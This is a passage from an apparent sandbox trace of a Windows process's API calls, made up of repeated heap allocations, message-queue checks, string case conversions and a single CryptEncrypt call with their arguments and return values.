wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.747] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.747] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.748] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.748] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.748] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.748] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.748] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.749] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.749] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0258.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.750] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.750] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.751] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.758] 